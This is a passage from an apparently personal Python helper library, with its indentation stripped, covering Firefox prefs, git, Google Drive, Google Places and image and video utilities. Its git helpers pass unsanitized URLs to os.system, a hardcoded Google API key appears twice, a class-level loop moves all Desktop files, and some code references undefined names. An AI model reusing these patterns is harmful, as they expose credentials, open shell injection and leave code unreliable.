open(Join("/", GLOBAL_FIREFOX_PROFILE_PATH, R, "prefs.js"), "w").write('// Mozilla User Preferences\n\n// DO NOT EDIT THIS FILE.\n//\n// If you make changes to this file while the application is running,\n// the changes will be overwritten when the application exits.\n//\n// To change a preference value, you can either:\n// - modify it via the UI (e.g. via about:config in the browser); or\n// - set it within a user.js file in your profile.\n\nuser_pref("app.normandy.first_run", false);\nuser_pref("app.normandy.user_id", "06ce59be-456c-b540-9a47-0941c6043180");\nuser_pref("app.update.auto", false);\nuser_pref("app.update.elevate.version", "66.0.3");\nuser_pref("app.update.enabled", false);\nuser_pref("app.update.lastUpdateTime.addon-background-update-timer", 1553728744);\nuser_pref("app.update.lastUpdateTime.background-update-timer", 1550635354);\nuser_pref("app.update.lastUpdateTime.blocklist-background-update-timer", 1553728915);\nuser_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1550633597);\nuser_pref("app.update.lastUpdateTime.recipe-client-addon-run", 0);\nuser_pref("app.update.lastUpdateTime.search-engine-update-timer", 1550635039);\nuser_pref("app.update.lastUpdateTime.services-settings-poll-changes", 1550635420);\nuser_pref("app.update.lastUpdateTime.telemetry_modules_ping", 0);\nuser_pref("app.update.lastUpdateTime.xpi-signature-verification", 1553729321);\nuser_pref("app.update.silent", true);\nuser_pref("app.update.url", "xxxhttps://xxxaus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VERSION%/%SYSTEM_CAPABILITIES%/%DISTRIBUTION%/%DISTRIBUTION_VERSION%/update.xml");\nuser_pref("browser.bookmarks.restore_default_bookmarks", false);\nuser_pref("browser.cache.disk.capacity", 1048576);\nuser_pref("browser.cache.disk.filesystem_reported", 1);\nuser_pref("browser.cache.disk.smart_size.first_run", false);\nuser_pref("browser.cache.disk.smart_size.use_old_max", false);\nuser_pref("browser.cache.frecency_experiment", 1);\nuser_pref("browser.contentblocking.category", "standard");\nuser_pref("browser.ctrlTab.recentlyUsedOrder", false);\nuser_pref("browser.download.importedFromSqlite", true);\nuser_pref("browser.laterrun.bookkeeping.profileCreationTime", 1550633567);\nuser_pref("browser.laterrun.bookkeeping.sessionCount", 13);\nuser_pref("browser.migrated-sync-button", true);\nuser_pref("browser.migration.version", 77);\nuser_pref("browser.newtabpage.activity-stream.asrouter.userprefs.cfr", false);\nuser_pref("browser.newtabpage.activity-stream.feeds.section.highlights", false);\nuser_pref("browser.newtabpage.activity-stream.feeds.section.topstories", false);\nuser_pref("browser.newtabpage.activity-stream.feeds.snippets", false);\nuser_pref("browser.newtabpage.activity-stream.feeds.topsites", false);\nuser_pref("browser.newtabpage.activity-stream.impressionId", "{c85341b3-f663-9243-bac9-83b8e7427423}");\nuser_pref("browser.newtabpage.activity-stream.migrationExpired", true);\nuser_pref("browser.newtabpage.activity-stream.migrationLastShownDate", 1553659200);\nuser_pref("browser.newtabpage.activity-stream.migrationRemainingDays", 2);\nuser_pref("browser.newtabpage.activity-stream.prerender", false);\nuser_pref("browser.newtabpage.activity-stream.section.highlights.includeBookmarks", false);\nuser_pref("browser.newtabpage.activity-stream.section.highlights.includeDownloads", false);\nuser_pref("browser.newtabpage.activity-stream.section.highlights.includePocket", false);\nuser_pref("browser.newtabpage.activity-stream.section.highlights.includeVisited", false);\nuser_pref("browser.newtabpage.activity-stream.showSearch", false);\nuser_pref("browser.newtabpage.activity-stream.showSponsored", false);\nuser_pref("browser.newtabpage.enabled", false);\nuser_pref("browser.newtabpage.enhanced", true);\nuser_pref("browser.newtabpage.storageVersion", 1);\nuser_pref("browser.pageActions.persistedActions", "{"version":1,"ids":["bookmark","bookmarkSeparator","copyURL","emailLink","addSearchEngine","sendToDevice","shareURL","pocket"],"idsInUrlbar":["pocket","bookmark"]}");\nuser_pref("browser.pagethumbnails.storage_version", 3);\nuser_pref("browser.places.smartBookmarksVersion", 7);\nuser_pref("browser.preferences.advanced.selectedTabIndex", 0);\nuser_pref("browser.preferences.defaultPerformanceSettings.enabled", false);\nuser_pref("browser.rights.3.shown", true);\nuser_pref("browser.safebrowsing.provider.google4.lastupdatetime", "1557288602301");\nuser_pref("browser.safebrowsing.provider.google4.nextupdatetime", "1557290413301");\nuser_pref("browser.safebrowsing.provider.mozilla.lastupdatetime", "1557288602720");\nuser_pref("browser.safebrowsing.provider.mozilla.nextupdatetime", "1557292202720");\nuser_pref("browser.search.cohort", "nov17-2");\nuser_pref("browser.search.countryCode", "US");\nuser_pref("browser.search.hiddenOneOffs", "Google,Bing,Amazon.com,DuckDuckGo,eBay,Twitter,Wikipedia (en)");\nuser_pref("browser.search.region", "US");\nuser_pref("browser.search.suggest.enabled", false);\nuser_pref("browser.sessionstore.upgradeBackup.latestBuildID", "20190211233335");\nuser_pref("browser.shell.checkDefaultBrowser", false);\nuser_pref("browser.shell.didSkipDefaultBrowserCheckOnFirstRun", true);\nuser_pref("browser.slowStartup.averageTime", 975);\nuser_pref("browser.slowStartup.samples", 1);\nuser_pref("browser.startup.homepage", "about:blank");\nuser_pref("browser.startup.homepage_override.buildID", "20190124174741");\nuser_pref("browser.startup.homepage_override.mstone", "65.0");\nuser_pref("browser.uiCustomization.state", "{"placements":{"widget-overflow-fixed-list":[],"nav-bar":["back-button","forward-button","stop-reload-button","home-button","customizableui-special-spring1","urlbar-container","customizableui-special-spring2","downloads-button","library-button","sidebar-button"],"TabsToolbar":["tabbrowser-tabs","new-tab-button","alltabs-button"],"PersonalToolbar":["personal-bookmarks"]},"seen":["developer-button"],"dirtyAreaCache":["nav-bar"],"currentVersion":15,"newElementCount":2}");\nuser_pref("browser.urlbar.placeholderName", "Google");\nuser_pref("browser.urlbar.searchSuggestionsChoice", false);\nuser_pref("browser.urlbar.suggest.bookmark", false);\nuser_pref("browser.urlbar.suggest.openpage", false);\nuser_pref("browser.urlbar.suggest.searches", false);\nuser_pref("browser.urlbar.timesBeforeHidingSuggestionsHint", 1);\nuser_pref("datareporting.healthreport.uploadEnabled", false);\nuser_pref("datareporting.policy.dataSubmissionPolicyAcceptedVersion", 2);\nuser_pref("datareporting.policy.dataSubmissionPolicyNotifiedTime", "1550633570624");\nuser_pref("datareporting.sessions.current.activeTicks", 7);\nuser_pref("datareporting.sessions.current.clean", true);\nuser_pref("datareporting.sessions.current.firstPaint", 664);\nuser_pref("datareporting.sessions.current.main", 73);\nuser_pref("datareporting.sessions.current.sessionRestored", 2511);\nuser_pref("datareporting.sessions.current.startTime", "1550633939369");\nuser_pref("datareporting.sessions.current.totalTime", 37);\nuser_pref("devtools.onboarding.telemetry.logged", true);\nuser_pref("distribution.iniFile.exists.appversion", "65.0");\nuser_pref("distribution.iniFile.exists.value", false);\nuser_pref("dom.apps.reset-permissions", true);\nuser_pref("dom.forms.autocomplete.formautofill", true);\nuser_pref("dom.mozApps.used", true);\nuser_pref("e10s.rollout.cohort", "unsupportedChannel");\nuser_pref("experiments.activeExperiment", false);\nuser_pref("extensions.blocklist.lastModified", "Tue, 26 Mar 2019 17:13:55 GMT");\nuser_pref("extensions.blocklist.pingCountVersion", -1);\nuser_pref("extensions.databaseSchema", 28);\nuser_pref("extensions.e10sBlockedByAddons", false);\nuser_pref("extensions.enabledAddons", "%7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:46.0");\nuser_pref("extensions.getAddons.cache.lastUpdate", 1553728744);\nuser_pref("extensions.getAddons.databaseSchema", 5);\nuser_pref("extensions.lastAppBuildId", "20190124174741");\nuser_pref("extensions.lastAppVersion", "65.0");\nuser_pref("extensions.lastPlatformVersion", "65.0");\nuser_pref("extensions.pendingOperations", false);\nuser_pref("extensions.webcompat.perform_injections", true);\nuser_pref("extensions.webcompat.perform_ua_overrides", true);\nuser_pref("extensions.webextensions.uuids", "{"formautofill@mozilla.org":"fd82627d-7029-df44-854c-65997238f507","screenshots@mozilla.org":"1b26d190-485a-3a41-991d-cbdbedab016b","webcompat-reporter@mozilla.org":"cdb30fdf-9916-544d-9ae5-be2506ea93c1","webcompat@mozilla.org":"f3f59ad4-5a24-054e-9a2d-8807fc628a8e"}");\nuser_pref("font.internaluseonly.changed", false);\nuser_pref("gecko.buildID", "20160421124000");\nuser_pref("gecko.mstone", "46.0");\nuser_pref("layers.acceleration.disabled", true);\nuser_pref("lightweightThemes.persisted.headerURL", false);\nuser_pref("lightweightThemes.usedThemes", "[]");\nuser_pref("media.gmp.storage.version.observed", 1);\nuser_pref("network.cookie.prefsMigrated", true);\nuser_pref("network.predictor.cleaned-up", true);\nuser_pref("pdfjs.enabledCache.state", false);\nuser_pref("pdfjs.migrationVersion", 2);\nuser_pref("pdfjs.previousHandler.alwaysAskBeforeHandling", true);\nuser_pref("pdfjs.previousHandler.preferredAction", 4);\nuser_pref("places.history.expiration.transient_current_max_pages", 112348);\nuser_pref("plugin.disable_full_page_plugin_for_types", "application/pdf");\nuser_pref("privacy.cpd.offlineApps", true);\nuser_pref("privacy.cpd.siteSettings", true);\nuser_pref("privacy.sanitize.migrateClearSavedPwdsOnExit", true);\nuser_pref("privacy.sanitize.pending", "[]");\nuser_pref("privacy.sanitize.timeSpan", 0);\nuser_pref("security.sandbox.content.tempDirSuffix", "d0b0a17d-ddae-9c44-bb41-7cfca103ccd5");\nuser_pref("security.sandbox.plugin.tempDirSuffix", "9ad5aae9-5dc2-ac4f-9263-0195647a6ab7");\nuser_pref("services.blocklist.addons.checked", 1550635565);\nuser_pref("services.blocklist.onecrl.checked", 1550635565);\nuser_pref("services.blocklist.plugins.checked", 1550635565);\nuser_pref("services.settings.clock_skew_seconds", -145);\nuser_pref("services.settings.last_update_seconds", 1550635565);\nuser_pref("services.settings.main.language-dictionaries.last_check", 1550635565);\nuser_pref("services.settings.main.onboarding.last_check", 1550635565);\nuser_pref("services.settings.main.sites-classification.last_check", 1550635565);\nuser_pref("services.sync.clients.lastSync", "0");\nuser_pref("services.sync.clients.lastSyncLocal", "0");\nuser_pref("services.sync.declinedEngines", "");\nuser_pref("services.sync.engine.addresses.available", true);\nuser_pref("services.sync.globalScore", 0);\nuser_pref("services.sync.migrated", true);\nuser_pref("services.sync.nextSync", 0);\nuser_pref("services.sync.tabs.lastSync", "0");\nuser_pref("services.sync.tabs.lastSyncLocal", "0");\nuser_pref("signon.importedFromSqlite", true);\nuser_pref("signon.rememberSignons", false);\nuser_pref("toolkit.startup.last_success", 1557288598);\nuser_pref("toolkit.telemetry.cachedClientID", "c0ffeec0-ffee-c0ff-eec0-ffeec0ffeec0");\nuser_pref("toolkit.telemetry.previousBuildID", "20190124174741");\nuser_pref("toolkit.telemetry.reportingpolicy.firstRun", false);\n')
Binarydata().export("places.sqlite", Join("/", GLOBAL_FIREFOX_PROFILE_PATH, R, "places.sqlite"))
class GitHub:
def get(self,url):
print("git clone %s" % url)
os.system("git clone %s" % url)
def pull(self,url):
os.system("git pull %s" % (url))
def push(self,username,repository):
os.system("git remote set-url origin 'https://%s@github.com/%s/%s.git'; git add *; git commit -m \"initial commit\"; git push origin master"%(username,username,repository))
class Google_Drive:
def __init__(self, Email_Address):
#https://developers.google.com/drive/api/v3/quickstart/python
# FIRST, EXPORT THE CREDS NO.1.
# YEAH, THEN IT JAX THAT TO NOW GET TOKEN.PICKLE!!!!
import os
ADDY = "." + "|".join([Email_Address, "Client_Secret", "GSuite"]) + ".json"
Binarydata().export(ADDY)
GDRIVE_PICKLE_ADDRESS = "." + "|".join([Email_Address, "Client_Secret_3", "GSuite"]) + ".pickle"
if GDRIVE_PICKLE_ADDRESS not in os.listdir():
if GDRIVE_PICKLE_ADDRESS in key("filename", All(Binarydata)):
Binarydata().export(GDRIVE_PICKLE_ADDRESS)
else:
1
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
# If modifying these scopes, delete the file GDRIVE_PICKLE_ADDRESS.
SCOPES = ['https://www.googleapis.com/auth/drive']
"""Shows basic usage of the Drive v3 API.
Prints the names and ids of the first 10 files the user has access to.
"""
creds = None
# The file GDRIVE_PICKLE_ADDRESS stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists(GDRIVE_PICKLE_ADDRESS):
with open(GDRIVE_PICKLE_ADDRESS, 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
OSA().display_dialog("A browser will open and you will be asked to log in and accept permissions to use the Google Drive API. Click OK to continue.",text_prompt=False)
flow = InstalledAppFlow.from_client_secrets_file(
ADDY, SCOPES)
creds = flow.run_local_server()
# Save the credentials for the next run
with open(GDRIVE_PICKLE_ADDRESS, 'wb') as token:
pickle.dump(creds, token)
service = build('drive', 'v3', credentials=creds)
self.service = service
# Call the Drive v3 API
results = service.files().list(
pageSize=10, fields="nextPageToken, files(id, name)").execute()
items = results.get('files', [])
if not items:
print('No files found.')
else:
print('Files:')
for item in items:
print(u'{0} ({1})'.format(item['name'], item['id']))
Binarydata().update_or_create(GDRIVE_PICKLE_ADDRESS)
Binarydata().export(GDRIVE_PICKLE_ADDRESS)
def create(self, address, public = True):
service = self.service
ext_dict = {".doc": "application/msword",".dot": "application/msword",".docx": "application/vnd.openxmlformats-officedocument.wordprocessingml.document",".dotx": "application/vnd.openxmlformats-officedocument.wordprocessingml.template",".docm": "application/vnd.ms-word.document.macroEnabled.12",".dotm": "application/vnd.ms-word.template.macroEnabled.12",".xls": "application/vnd.ms-excel",".xlt": "application/vnd.ms-excel",".xla": "application/vnd.ms-excel",".xlsx": "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet",".xltx": "application/vnd.openxmlformats-officedocument.spreadsheetml.template",".xlsm": "application/vnd.ms-excel.sheet.macroEnabled.12",".xltm": "application/vnd.ms-excel.template.macroEnabled.12",".xlam": "application/vnd.ms-excel.addin.macroEnabled.12",".xlsb": "application/vnd.ms-excel.sheet.binary.macroEnabled.12",".ppt": "application/vnd.ms-powerpoint",".pot": "application/vnd.ms-powerpoint",".pps": "application/vnd.ms-powerpoint",".ppa": "application/vnd.ms-powerpoint",".pptx": "application/vnd.openxmlformats-officedocument.presentationml.presentation",".potx": "application/vnd.openxmlformats-officedocument.presentationml.template",".ppsx": "application/vnd.openxmlformats-officedocument.presentationml.slideshow",".ppam": "application/vnd.ms-powerpoint.addin.macroEnabled.12",".pptm": "application/vnd.ms-powerpoint.presentation.macroEnabled.12",".potm": "application/vnd.ms-powerpoint.template.macroEnabled.12",".ppsm": "application/vnd.ms-powerpoint.slideshow.macroEnabled.12",".mdb": "application/vnd.ms-access"}
ext = "." + address.split(".")[-1]
if ext not in ext_dict:
OSA.display_dialog("extension %s not in ext_dict.\n Please add it." % (ext), text_prompt = False)
import googleapiclient
media = googleapiclient.http.MediaFileUpload(address,
mimetype=ext_dict[ext],
resumable=False)
file_metadata = {
'name': address.replace("_", " "),
'mimeType': ext_dict[ext],
}
file = service.files().create(body=file_metadata,
media_body=media,
fields='id').execute()
print('File ID: %s' % file.get('id'))
ID = file.get("id")
if public == True:
service.permissions().create(body={"role":"reader", "type":"anyone"}, fileId=ID).execute()
URL = "https://drive.google.com/file/d/{}/view".format(ID)
return URL
@staticmethod
def tests():
Email_Address = a_shop().Business_Email_Address
ADDY = "." + "|".join([Email_Address, "Client_Secret", "GSuite"]) + ".json"
assert ADDY in key("filename", All(Binarydata))
R = Google_Drive(Email_Address = Email_Address)
Test_Address = "Test.docx"
text_to_docx("Test", Test_Address)
R.create(address = Test_Address, public = True)
rm("Test.docx")
class Google_Places_Search:
def google_places_search(x="40.7532616",y="-73.9839516",radius=3500,name="restaurant"):
# from https://stackoverflow.com/questions/50573658/python-google-places-api
# This covers from Houston Street to 79th St at these coordinates with radius 3500 meters
import requests
import json
APIKEY = "AIzaSyBFx8hqftDOlrSWRTiOSowjwfeS1OQtBpw"
def findPlaces(loc,radius, pagetoken = None):
lat, lng = loc
type = "restaurant"
#url = "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location={lat},{lng}&radius={radius}&type={type}&key={APIKEY}{pagetoken}".format(lat = lat, lng = lng, radius = radius, type = type,APIKEY = APIKEY, pagetoken = "&pagetoken="+pagetoken if pagetoken else "")
url = "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location={lat},{lng}&radius={radius}&name={name}&key={APIKEY}{pagetoken}".format(lat = lat, lng = lng, radius = radius, name = name,APIKEY = APIKEY, pagetoken = "&pagetoken="+pagetoken if pagetoken else "")
print(url)
response = requests.get(url)
res = json.loads(response.text)
# print(res)
print("here results ---->>> ", len(res["results"]))
for result in res["results"]:
info = ";".join(map(str,[result["name"],result["geometry"]["location"]["lat"],result["geometry"]["location"]["lng"],result.get("rating",0),result["place_id"]]))
print(info)
pagetoken = res.get("next_page_token",None)
print("here -->> ", pagetoken)
return pagetoken, res["results"]
# pagetoken = "CpQFhwIAADQWOcVI1wll-B869Z24El48rXw18gKoab_keD65V18zFEvPjKIfrS79Pc_vXJcZQtOuF0RObQG20ph-GE3ssP3k1fu8zsYbw5g3UPbSjAvQLdXkdD1qAWztXj7hc5Kxc4pYRyGM1_ljVOHg3Py_zSlYscnoNjCvRua2MDQgusCsEquNqGREFdvhjDkbeMhEFYxHucTnIn96OxIJEpamePTHsBooYyPBaa_ejGZ_C99QeDjpSkSKBgEe3aL1uWKlYhsGKh7biQUR5rKsKPodwccLIrW8Gr5tag3NH0sLPExHHvqzlpkj--KIuydTVjPH7u2zHxmPByServ2S5xjXYUBRr-ly3e1xPsVMhZZH9TxfttCIHLscBvpvCswIfaGYdl3bEzsrFISfpp0rpKtlp9gWGY7Tbk2n6s3etCHQEHn2qmM8bsJwkZV81pUWN0j9C9RX-ywOyIKY2yp1w_Iq1mRwOwY4mckbicOoooHiV6JER4xe7Kizw9hbXOnezn_NMk15TLwRoXlfL1s73uwogo-VWE8c-V1HqRpWQSyudRhLwhOEclrICXIdxICOgTgYO1z57xCEerw3QUL_7MPDrlbbh_AlX8I6Jfe8IhQ1Fkqu_njatm6aBTjkp2CSqlvZJpI_Lrv330VcyFEqBkGn7NJew3I9xofSrBaXFa8ABi6DXQm6-yC32OEyf7GHNXINjT1IB0yh6KR6c0qzaqiqOzKcuuai9XqEMQNNKyi6EuhzH5TP9YA56N3JhnXRFhs2aWHZhLlieVI6_uqzpZSgYjUem8aQrMTlmHw0kIYU8I-Ca041C4Zm2gMezwygRrhzsOoAmbmu96nft0KuIWTB3A_xGVKYQ2qjb2KRM7nsglnSEhDoNs8EhvuIm0FQs30YSCp5GhRO3b3Tn5rsLuwiWgu8hwEGhL0S1A"
pagetoken = None
results = []
while True:
pagetoken, results_ = findPlaces(loc=(x,y),radius=radius,pagetoken=pagetoken)
results.extend(results_)
import time
# time.sleep(5)
time.sleep(10)
if not pagetoken:
break
return results
"""
assert len(google_places_search(name="trader joes")) == 6
assert len(google_places_search(name="park")) == 0
assert len(google_places_search(name="central park")) == 3
"""
def getinfo(placeid):
APIKEY="AIzaSyBFx8hqftDOlrSWRTiOSowjwfeS1OQtBpw"
fields=["formatted_address","formatted_phone_number","opening_hours","name","rating","website"]
#url= "https://maps.googleapis.com/maps/api/place/details/json?key={}&placeid={}&fields={}".format(
# APIKEY,placeid,",".join(fields))
url= "https://maps.googleapis.com/maps/api/place/details/json?placeid={}&key={}&fields={}".format(
placeid,APIKEY,",".join(fields))
r = requests.get(url)
#return url
data = json.loads(r.text)
return data
class Images(object):
def flexor_and_tenor(self, address, size, logo_scaling_dimension_size):
import cv2, numpy as np
pic = cv2.imread(address)
t1, t2 = pic.shape[0]*(size[0]/logo_scaling_dimension_size[0]), pic.shape[1]*(size[1]/logo_scaling_dimension_size[1])
t1, t2 = int(t1,), int(t2,)
pic[0:t1,0:t2,0:,] = np.array([255,255,255])
cv2.imwrite(address, pic)
return address
for i in os.listdir(homepath("~/Desktop")):
os.system("mv '/Users/$USER/Desktop/%s' '/Users/$USER/tavern/tavern/soda/dls/'"%(i))
def image_binary(self,address):
import cv2
img_grey = cv2.imread(r, cv2.IMREAD_GRAYSCALE)
img_binary = cv2.threshold(img_grey, 128, 255, cv2.THRESH_BINARY)[1]
return img_binary
def image_base64(self, address):
import base64
return base64.b64encode(open(address,"rb").read())
def vstack(self, images= ["hot.png"]*3, destination_address=None):
imgs = pool(Image.open,images).result()
widths = set(lmap(lambda i: Image.open(i).size[0],images))
print(widths)
min_shape = sorted( [(np.sum(i.size), i.size ) for i in imgs])[0][1]
x = list((np.asarray( i ) for i in imgs ))
imgs_comb = np.vstack( (np.asarray( i ) for i in x ) )
import scipy.misc
print(imgs_comb.shape)
scipy.misc.imsave(input("destination address?: ") if destination_address == None else destination_address,imgs_comb)
return destination_address
def slow_vstack(self, images, destination_address=None):
imgs = pool(Image.open,images).result()
min_shape = sorted( [(np.sum(i.size), i.size ) for i in imgs])[0][1]
arrays = pool(np.asarray,imgs).result()
jaxpel = arrays[0]
for idx,i in enum(arrays[:-1]):
try:
jaxpel = np.vstack([jaxpel, arrays[idx+1]])
redprint(idx, jaxpel.shape)
except Exception as e:
redprint("some error.")
imgs_comb = Image.fromarray( jaxpel)
imgs_comb.save(input("destination address?: ") if destination_address == None else destination_address )
return destination_address
def hstack(self, images):
import numpy as np
"""
imgs = []
import numpy as np
imgs.append(np.full((1000,100,3),255,dtype=np.uint8))
imgs.append(np.full((1000,100,3),255,dtype=np.uint8))
imgs.append(np.full((800,100,3),255,dtype=np.uint8))
import cv2
addresses = [get_random_address(homepath("~/tavern/tavern/soda/dls")).png() for i in range(3)]
for address,i in zip(addresses,imgs):
cv2.imwrite(address,i)
images = addresses
"""
imgs = pool(Image.open,images).result()
min_shape = sorted( [(np.sum(i.size), i.size ) for i in imgs])[0][1][1]
min_shape_2 = sorted( [(np.sum(i.size), i.size ) for i in imgs])[0][1][0]
max_shape = sorted( [(np.sum(i.size), i.size ) for i in imgs],reverse=True)[0][1][1]
for idx,i in enum(imgs):
if i.size[1] != max_shape:
x = cv2.imread(images[idx])
import numpy as np
new = np.full((max_shape,min_shape_2,3),0,dtype=np.uint8)
new[0:i.size[1],0:min_shape_2,] = x
cv2.imwrite(images[idx],new)
imgs = pool(Image.open,images).result()
imgs_comb = np.hstack( (np.asarray( i ) for i in imgs ) )
import scipy.misc
print(imgs_comb.shape)
destination_address = get_random_address(homepath("~/tavern/tavern/soda/dls")).png()
scipy.misc.imsave(destination_address,imgs_comb)
return destination_address
def __init__(self):
import urllib.request
from PIL import Image
from PIL import ImageEnhance, ImageFilter
import cv2
import numpy as np
from moviepy.editor import VideoFileClip
globals().update(locals())
def download(self, url="http://www.gunnerkrigg.com//comics/00000001.jpg", save_path=None):
if not save_path:
save_folder = os.path.expanduser("~/tavern/tavern/soda/dls")
os.makedirs(save_folder, exist_ok=True)
save_path = get_random_address(save_folder).jpg()
print('Saving to.. %s'%save_path)
try:
import urllib
urllib.request.urlretrieve(url, save_path)
#open(save_path,"wb").write(requests.get(url).raw)
except Exception as e:
redprint("%s, url: %s"%(e, url))
time.sleep(5)
return Images().download(url,save_path)
return save_path
def resize_disregard_proportion(self, width, height, infile, outfile):
from PIL import Image
x = Image.open(infile)
x = x.resize((width, height), Image.ANTIALIAS)
x.save(outfile)
return outfile
@staticmethod
@timeit
def images_to_video(images, width, height, framerate, outfile):
"""[Annotation] if you edit this, it doesn't look like it makes sense, but that's usual for this stuff. [assume it works]"""
from PIL import Image
import cv2
import os
"""[Hard-Add B] emitting"""
print("initiating Images().images_to_video")
print("[Emit] Verifying image_paths are Images --")
"""[Annotation] [Hard-Add A] (part of a compilation of hard-adds)"""
images = sudby(lambda i: tp(lambda:Image.open(i)), images)
"""[Annotation] here, i had to change the names to .png and do some complicated thing with blips in it """
olds, news = ["%s.png"%(".".join(i.split(".")[:-1])) for i in images], images
[Image.open(old).save(new) for old,new in zip(olds,news) if old.endswith(".png") == False and old != new] #chx4if!=png\|undeeded
images = ["%s.png"%(".".join(i.split(".")[:-1])) for i in images]
"""[Hard-Add B] emitting"""
print("[Emit] Changed all image_paths to PNG format")
print("[Emit] Resizing all images now -- ")
"""[Annotation] here, resize """
for IMAGE_FILENAME_TO_SIZE in images:
print(IMAGE_FILENAME_TO_SIZE)
x = Image.open(IMAGE_FILENAME_TO_SIZE)
x = x.resize((width, height), Image.ANTIALIAS)
x.save(IMAGE_FILENAME_TO_SIZE)
"""[Hard-Add B] emitting"""
print("[Emit] Adding images to outfile %s -- "%outfile)
"""[Annotation] here, took this code from stackoverflow; basically it makes an `out` and adds images to it."""
out = cv2.VideoWriter(outfile, cv2.VideoWriter_fourcc(*"mp4v"), framerate, (width, height))
def add_images_to_out(out, images):
for image in images:
frame = cv2.imread(image)
out.write(frame) # Write out frame to video
cv2.imshow("video",frame)
if (cv2.waitKey(1) & 0xFF) == ord("q"): # Hit `q` to exit
break
return out
add_images_to_out(out, images).release()
"""[Hard-Add B] emitting"""
print("[Emit] Video file successfully created. cv2 cleaning up --")
"""[Annotation] [No-annotation]"""
cv2.destroyAllWindows()
"""[Annotation] [No-annotation]"""
print("The output video is {}".format(outfile))
"""[Hard-Add B] emitting"""
print("[Emit] End of images_to_video --*")
return outfile
""" [A Test] \"\"\"
import os
test_photos_path = os.path.expanduser("~/Documents/photos/test")
if not os.path.exists(test_photos_path):
print("you must create a photo directory with images at ~/Documents/photos/test")
print("ending test..")
os.chdir(test_photos_path)
images_to_video(os.listdir(), 1920, 1080, 60, "out.mp4")
"""
def images_to_video2(self, images, frames_per_image = 60):
framerate = 30
# images = ["image1.jpg"]
out_location = get_random_address(homepath("~/tavern/tavern/soda/dls")).mp4()
images = sudby(lambda i: tp(lambda:Image.open(i)), images)
width, height, layers = cv2.imread(images[0]).shape
out = cv2.VideoWriter(out_location, cv2.VideoWriter_fourcc(*"mp4v"), framerate, (width, height))
images = lmap(lambda i: cv2.imread(i), images)
for i in images:
for j in range(frames_per_image):
out.write(i)
out.release()
r = VideoFileClip(out_location)
print(r.duration)
os.system("open %s"%(out_location))
return out_location
@staticmethod
def image_show(images):
# final = concatenate([VideoFileClip(clips[0]),
# VideoFileClip(clips[1]).crossfadein(0.5),
# VideoFileClip(clips[2]).crossfadein(0.5),
# ],
# padding=-1, method="compose")
frames_per_image = int(OSA.log("frames per image?"))
crossfadein = 0.5
extra_frames = int(30 * crossfadein)
frames_per_image = frames_per_image + 30 + extra_frames
# clips = [Images().images_to_video2([images[0]], frames_per_image - 30)] + lmap(lambda i: Images().images_to_video2([i], frames_per_image), images[1:])
clips = [Images().images_to_video2([images[0]], frames_per_image - extra_frames)] + lmap(lambda i: Images().images_to_video2([i], frames_per_image), images[1:])
# clips = lmap(lambda i: Images().images_to_video2([i], frames_per_image), images)
from moviepy.editor import VideoFileClip
from moviepy.editor import concatenate
# 'final = VideoFileClip(clips[0])\nfor i in clips[1:]:\n final = concatenate([final,\n VideoFileClip(i).crossfadein(0.5)],\n padding=-1, method="compose")'
final = concatenate([VideoFileClip(clips[0]),
*lmap(lambda i: VideoFileClip(i).crossfadein(crossfadein), clips[1:])],
padding=-1, method="compose")
out_location = get_random_address(homepath("~/tavern/tavern/soda/dls")).mp4()
final.write_videofile(out_location)
os.system("open '{}'".format(out_location))
return out_location
def resize(self, fn, size=1200):
if not size:
return fn
im = Image.open(fn)
import numpy as np
image_size = np.array(im.size)
# ratio = max(image_size)/size
ratio = image_size[0]/size
new_size = image_size / ratio
new_size = [int(round(i)) for i in new_size]
im = im.resize(new_size)
im.save(fn)
return fn
def resize_via_width(self, address, desired_width=1200):
# Always Resize The Bitch.
im = Image.open(address)
aspect_ratio = im.size[1]/im.size[0]
im = im.resize((desired_width,Integer(desired_width*aspect_ratio) ))
im.save(address)
return address
def resize_over_background(self, address, size):
img = cv2.imread(address)
size_ = size
size = list(tcer(img.shape[:2]))
larger_side = max(size)
x = np.full((larger_side,larger_side,3),77,dtype=np.uint8)
to_subtract = 0
if size[0] > size[1]:
diff = int(larger_side - size[1])
if diff % 2 == 1:
to_subtract = 1
diff = int(diff / 2)
diff1 = diff
x[diff:int(larger_side-diff)-to_subtract,0:larger_side] = img
elif size[1] > size[0]:
diff = int(larger_side - size[0])
if diff % 2 == 1:
to_subtract = 1
diff = int(diff / 2)
diff1 = diff
x[0:larger_side,diff:int(larger_side-diff1)-to_subtract] = img
else:
x[0:larger_side,0:larger_side] = img
cv2.imwrite(address,x)
address = Images().resize(address,size_)
return address
def get_image_size(self, address):
return Image.open(address).size
def image_size(x):
import PIL
if type(x) == PIL.JpegImagePlugin.JpegImageFile:
return x.size
else:
return tuple(tcer(x.shape[:2]))
def download_and_resize(self, url, size=1200, save_path = None):
save_path = self.download(url, save_path=save_path)
im = Image.open(save_path).convert("RGB")
import numpy as np
image_size = np.array(im.size)
ratio = max(image_size)/size
new_size = image_size / ratio
new_size = [int(i) for i in new_size]
im = im.resize(new_size)
im.save(save_path)
return save_path
def black_and_white(self, address):
from PIL import Image
image_file = Image.open(address) # open colour image
image_file = image_file.convert("L") # convert image to black and white
image_file.save(address)
return address
def fb_image_upload(self, x, init_shop=None, hash=False):
if init_shop == None:
init_shop = All(Shop)[0].shop_abbreviation
if not os.path.exists(x):
x = Images().download(x)
shop = Shop()( All(Shop)[0].shop_abbreviation)
image = AdImage(parent_id='act_%s'%shop.Facebook_Business_Ad_Account_ID)
image[AdImage.Field.filename] = x
image.remote_create()
time.sleep(1.2)
return image['url'] if hash == False else image['hash']
def bitly_url(self,url):
return json.loads(requests.get("https://api-ssl.bitly.com/v3/shorten?access_token={}&longUrl={}".format(Muta()().bitly_access_token, url)).text)["data"]["url"]
"""
bitly_url("https://google.com")
"""
def sharpen(self,x):
img = Image.open(x)
img = img.convert("RGB")
